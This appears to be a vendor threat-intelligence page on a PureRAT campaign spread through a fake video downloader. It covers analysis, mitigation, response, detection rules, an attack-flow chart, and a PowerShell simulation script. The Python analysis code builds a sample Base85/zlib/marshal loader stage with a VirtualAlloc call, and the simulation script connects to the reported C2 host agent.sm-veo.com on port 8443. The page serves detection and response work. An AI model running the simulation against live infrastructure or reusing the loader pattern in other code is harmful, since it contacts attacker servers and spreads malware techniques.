PureRAT Variant Discovered in AI Video Player
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A malware campaign is using a fake Google Drive-themed video downloader to launch a multi-stage execution chain. The infection moves from a Python-based loader to shellcode and then to a protected .NET assembly identified as PureRAT. The malware relies on heavy obfuscation, custom encryption, and authenticated WebSocket communications to manage command-and-control traffic.
Investigation
The investigation analyzed a staged execution flow that began with a Python bytecode loader. Researchers observed Base85 decoding, zlib decompression, and shellcode injection through VirtualAlloc. Further analysis uncovered a heavily protected .NET loader, Ykzrh/smveo-csharp-agent.exe, which used virtualization and runtime reconstruction to hinder analysis.
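The decode chain described above (Base85 decoding, zlib decompression, then marshal.loads of a code object) can be peeled statically, without ever executing a stage. The script below is an added example and is not code from the original write-up or from the malware: it first builds a constructed two-layer sample in that same shape, then unwraps it layer by layer and reports the names each code object references. The stage contents, the `SUSPICIOUS_NAMES` list and all function names are assumptions made for illustration.

```python
import base64
import marshal
import types
import zlib


def build_stage(source: str, name: str = "<stage>") -> bytes:
    """Wrap Python source the way the loader chain does:
    compile -> marshal.dumps -> zlib.compress -> base64.b85encode."""
    code = compile(source, name, "exec")
    return base64.b85encode(zlib.compress(marshal.dumps(code)))


# Constructed two-layer sample (assumption: not the real DriveVideo loader).
# The inner stage stands in for the VirtualAlloc/shellcode step; the outer
# stage is the loader that would decode it and exec(marshal.loads(...)) it.
INNER_STAGE = build_stage(
    "import ctypes\n"
    "buf = ctypes.windll.kernel32.VirtualAlloc(0, 4096, 0x3000, 0x40)\n"
)
OUTER_STAGE = build_stage(
    "import base64, marshal, zlib\n"
    f"blob = {INNER_STAGE!r}\n"
    "exec(marshal.loads(zlib.decompress(base64.b85decode(blob))))\n"
)


def peel(blob: bytes) -> types.CodeType:
    """Reverse one wrapping layer without executing it.

    marshal.loads is not hardened against hostile input (a crafted blob can
    crash the interpreter), so run this in a disposable analysis VM, and use
    the same CPython minor version the loader targets: the marshal format
    changes between releases.
    """
    raw = zlib.decompress(base64.b85decode(blob))
    obj = marshal.loads(raw)
    if not isinstance(obj, types.CodeType):
        raise TypeError(f"expected a code object, got {type(obj).__name__}")
    return obj


def byte_constants(code: types.CodeType) -> list[bytes]:
    """Collect bytes constants, recursing into nested functions and lambdas."""
    found = []
    for const in code.co_consts:
        if isinstance(const, bytes) and const:
            found.append(const)
        elif isinstance(const, types.CodeType):
            found.extend(byte_constants(const))
    return found


def unwrap_all(blob: bytes, max_depth: int = 10) -> list[dict]:
    """Statically peel nested stages, recording what each layer references."""
    report = []
    pending = [(blob, 0)]
    while pending:
        current, depth = pending.pop()
        if depth > max_depth:
            raise RuntimeError("too many nested layers; possible decoy loop")
        try:
            code = peel(current)
        except (ValueError, EOFError, TypeError, zlib.error):
            if depth == 0:
                raise       # the outermost blob must be a valid stage
            continue        # an ordinary bytes constant, not a nested stage
        report.append({
            "depth": depth,
            "names": sorted(set(code.co_names)),
            "strings": [c for c in code.co_consts if isinstance(c, str)],
        })
        for inner in byte_constants(code):
            pending.append((inner, depth + 1))
    return report


# Names that, taken together, characterise decode-then-execute loaders
# (assumption: tune this list to the samples you actually see).
SUSPICIOUS_NAMES = {"exec", "loads", "b85decode", "decompress", "windll", "VirtualAlloc"}


def indicators(report: list[dict]) -> list[str]:
    """Suspicious names seen anywhere in the unwrapped chain."""
    return sorted({n for layer in report for n in layer["names"] if n in SUSPICIOUS_NAMES})


if __name__ == "__main__":
    layers = unwrap_all(OUTER_STAGE)
    for layer in layers:
        print(f"depth {layer['depth']}: names={layer['names']}")
    print("indicators:", indicators(layers))
```

The point of inspecting `co_names` rather than running the stage is that the second layer advertises `windll` and `VirtualAlloc` before any shellcode is mapped; the same walk over `co_consts` is where a real sample's embedded DonutLoader shellcode or .NET blob would surface as a large bytes constant.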
Mitigation
Users should be warned against downloading files from unofficial or suspicious video-themed lures. Organizations should monitor for unauthorized Python execution and unusual .NET assembly behavior within local application data directories. Strong application allowlisting and monitoring for suspicious Run key changes can also reduce the risk of compromise.
Response
If this activity is detected, isolate affected endpoints immediately to disrupt further WebSocket-based command-and-control traffic. Investigators should perform memory forensics to capture the decrypted .NET payload and determine the scope of infection. Network logs should also be reviewed for connections to the smveo.com infrastructure, and any potentially exposed credentials should be rotated.
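The monitoring asked for in the Mitigation and Response sections (Run key values pointing into user-writable directories, anything touching the %LOCALAPPDATA%\SMVEO staging directory, and DNS or connection events naming the sm-veo.com / smveo.com infrastructure on port 8443) reduces to a handful of rules over endpoint telemetry. The following is an added Python example, not part of the original page or of any vendor's detection content. The records are constructed Sysmon-style events (IDs 3, 13 and 22 with their usual field names); the rule names, the user-writable path list and the sample paths are assumptions for illustration.

```python
import re

# Indicators taken from the write-up above; extend as new infrastructure is reported.
C2_DOMAINS = ("sm-veo.com", "smveo.com")   # suffix match also covers agent.sm-veo.com
C2_PORT = 8443
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
STAGING_DIR = re.compile(r"\\AppData\\Local\\SMVEO\\", re.I)
# Assumption: directories a standard user can write to without elevation.
USER_WRITABLE = re.compile(r"\\(AppData\\(Local|Roaming)|Temp|Downloads)\\", re.I)

# Constructed Sysmon-style records (illustrative, not captured telemetry).
# EventID 13 = RegistryEvent (value set), 3 = NetworkConnect, 22 = DnsQuery.
SAMPLE_EVENTS = [
    {"EventID": 13,
     "Image": r"C:\Users\alice\AppData\Local\Programs\DriveVideo\DriveVideoSetup-x64-0.1.0.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\SMVEO",
     "Details": r"C:\Users\alice\AppData\Local\SMVEO\Ykzrh.exe"},
    {"EventID": 13,
     "Image": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"},
    {"EventID": 22,
     "Image": r"C:\Users\alice\AppData\Local\SMVEO\Ykzrh.exe",
     "QueryName": "agent.sm-veo.com"},
    {"EventID": 3,
     "Image": r"C:\Users\alice\AppData\Local\SMVEO\Ykzrh.exe",
     "DestinationHostname": "agent.sm-veo.com", "DestinationPort": 8443},
    {"EventID": 3,
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationHostname": "www.example.org", "DestinationPort": 443},
    {"EventID": 3,
     "Image": r"C:\Users\alice\AppData\Local\Programs\Python\Python312\python.exe",
     "DestinationHostname": "", "DestinationPort": 8443},
]


def c2_domain(host: str) -> bool:
    """Exact or subdomain match against the reported C2 domains."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in C2_DOMAINS)


def evaluate(ev: dict) -> list[str]:
    """Return the names of every rule the event trips (empty list = benign)."""
    hits = []
    image = ev.get("Image", "")
    if STAGING_DIR.search(image) or STAGING_DIR.search(ev.get("Details", "")):
        hits.append("smveo_staging_dir")
    if ev.get("EventID") == 13 and RUN_KEY.search(ev.get("TargetObject", "")):
        # A Run value whose target lives in a user-writable directory is the
        # generic pattern; the SMVEO rule above catches this campaign specifically.
        if USER_WRITABLE.search(ev.get("Details", "")):
            hits.append("run_key_user_writable_target")
    if ev.get("EventID") == 3:
        if c2_domain(ev.get("DestinationHostname", "")):
            hits.append("c2_domain")
        # Port 8443 from a binary in a user-writable path covers the case where
        # the hostname was not resolved in-line (direct IP, hard-coded resolver).
        if ev.get("DestinationPort") == C2_PORT and USER_WRITABLE.search(image):
            hits.append("c2_port_from_user_writable_image")
    if ev.get("EventID") == 22 and c2_domain(ev.get("QueryName", "")):
        hits.append("c2_domain")
    return hits


def run_rules(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Evaluate every event; returns (index, rule names) for those that matched."""
    findings = []
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            findings.append((i, hits))
    return findings


if __name__ == "__main__":
    for idx, rules in run_rules(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(rules)}")
```

The `c2_domain` and `smveo_staging_dir` rules are high-confidence on their own. The two user-writable-path rules are the generic half of the Mitigation advice and will also fire on legitimate per-user installers (OneDrive, Teams, browser updaters and the like register Run values under AppData), so in production they belong behind an allowlist of known publishers or signed images rather than going straight to an alert.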
```mermaid
graph TB
    %% Class Definitions Section
    classDef action fill:#99ccff
    classDef malware fill:#ff9999
    classDef persistence fill:#99ff99
    classDef obfuscation fill:#ffff99
    classDef tool fill:#cccccc

    %% Node definitions
    act_user_exec["<b>Action</b> – <b>T1204 User Execution</b><br/>Victim interacts with a lure<br/>disguised as a fake Google Drive<br/>or SMVEO video download."]
    class act_user_exec action
    act_drive_by["<b>Action</b> – <b>T1189 Drive-by Compromise</b><br/>User downloads malicious file:<br/>DriveVideoSetup-x64-0.1.0.exe."]
    class act_drive_by action
    mal_setup["<b>Malware</b> – <b>Initial Executable</b><br/>File: DriveVideoSetup-x64-0.1.0.exe<br/>Establishes persistence and<br/>starts deobfuscation chain."]
    class mal_setup malware
    per_registry["<b>Action</b> – <b>T1547.001 Persistence</b><br/>Modifies registry key:<br/>HKCU\Software\Microsoft\Windows\CurrentVersion\Run"]
    class per_registry persistence
    act_deobf["<b>Action</b> – <b>T1140 Deobfuscate/Decode Files</b><br/>Complex Python stages involving<br/>Base85 decoding, zlib decompression,<br/>and marshal.loads."]
    class act_deobf obfuscation
    tool_donut["<b>Tool</b> – <b>DonutLoader</b><br/>Mechanism used to execute<br/>shellcode in memory."]
    class tool_donut tool
    mal_ykzrh["<b>Malware</b> – <b>Ykzrh.exe</b><br/>Highly protected .NET loader<br/>utilizing virtualization."]
    class mal_ykzrh malware
    act_packing["<b>Action</b> – <b>T1027.002 Software Packing</b><br/>Uses custom bytecode interpreters<br/>and virtualization to hide core logic."]
    class act_packing obfuscation
    mal_purerat["<b>Malware</b> – <b>PureRAT</b><br/>Core functionality of the attack<br/>hidden via obfuscation."]
    class mal_purerat malware
    act_cert_steal["<b>Action</b> – <b>T1649 Steal or Forge Authentication Certificates</b><br/>Generates client.crt and client.key<br/>under %LOCALAPPDATA%\SMVEO\."]
    class act_cert_steal action
    comm_c2["<b>Action</b> – <b>C2 Communication</b><br/>Authenticated WebSocket communication<br/>to agent.sm-veo.com."]
    class comm_c2 action

    %% Connections
    act_user_exec -->|leads_to| act_drive_by
    act_drive_by -->|executes| mal_setup
    mal_setup -->|performs| per_registry
    mal_setup -->|initiates| act_deobf
    act_deobf -->|leads_to| tool_donut
    tool_donut -->|deploys| mal_ykzrh
    mal_ykzrh -->|utilizes| act_packing
    act_packing -->|hides| mal_purerat
    mal_purerat -->|performs| act_cert_steal
    act_cert_steal -->|facilitates| comm_c2
```
Attack Flow
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
Attack Narrative & Commands: The adversary has successfully deployed a PureRAT variant. To maintain control, the malware establishes a persistent Command and Control (C2) channel. Instead of standard HTTP polling, it uses an authenticated WebSocket connection, which can slip past web proxies that do not inspect long-lived WebSocket streams. The attacker's goal is a stable, low-latency tunnel to agent.sm-veo.com on port 8443. This simulation uses a PowerShell script to mimic that network behavior by initiating a connection to the malicious URI.
Regression Test Script:

```powershell
# Simulation of PureRAT Variant C2 via WebSocket
# Goal: Trigger the detection rule via destination domain or URL.
$targetUrl    = "wss://agent.sm-veo.com:8443/v1/ws"
$targetDomain = "agent.sm-veo.com"

Write-Host "[+] Starting PureRAT C2 Simulation..." -ForegroundColor Cyan
Write-Host "[+] Expected SIEM indicator: destination domain $targetDomain"
try {
    Write-Host "[+] Attempting to establish WebSocket connection to $targetUrl"
    # Using a .NET WebSocket client to simulate the specific protocol behavior
    $ws  = New-Object System.Net.WebSockets.ClientWebSocket
    $uri = New-Object System.Uri($targetUrl)
    $cts = New-Object System.Threading.CancellationTokenSource
    # We do not need a successful handshake for the network telemetry to trigger,
    # just the attempt to connect to the specified destination.
    $task = $ws.ConnectAsync($uri, $cts.Token)
    # Wait up to 5 seconds for the attempt. Wait() rethrows a failed handshake
    # as an AggregateException, so the catch block below actually runs on failure
    # (a plain Start-Sleep would leave the fault unobserved on the task).
    $null = $task.Wait(5000)
    Write-Host "[!] Connection attempt completed. Check SIEM for telemetry." -ForegroundColor Green
} catch {
    $reason = $_.Exception.GetBaseException().Message
    Write-Host "[!] Connection failed ($reason). Expected if the domain is sinkholed or does not resolve; the DNS query and connection attempt should still have generated telemetry." -ForegroundColor Yellow
} finally {
    if ($cts) { $cts.Dispose() }
    if ($ws)  { $ws.Dispose() }
}
```
Cleanup Commands:

```powershell
# No persistent files or registry keys were modified by this specific simulation script.
# If persistence (T1547.001) was simulated, use the following:
# Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'PureRAT_Update' -ErrorAction SilentlyContinue
Write-Host "[+] Cleanup complete. No artifacts left by network simulation." -ForegroundColor Cyan
```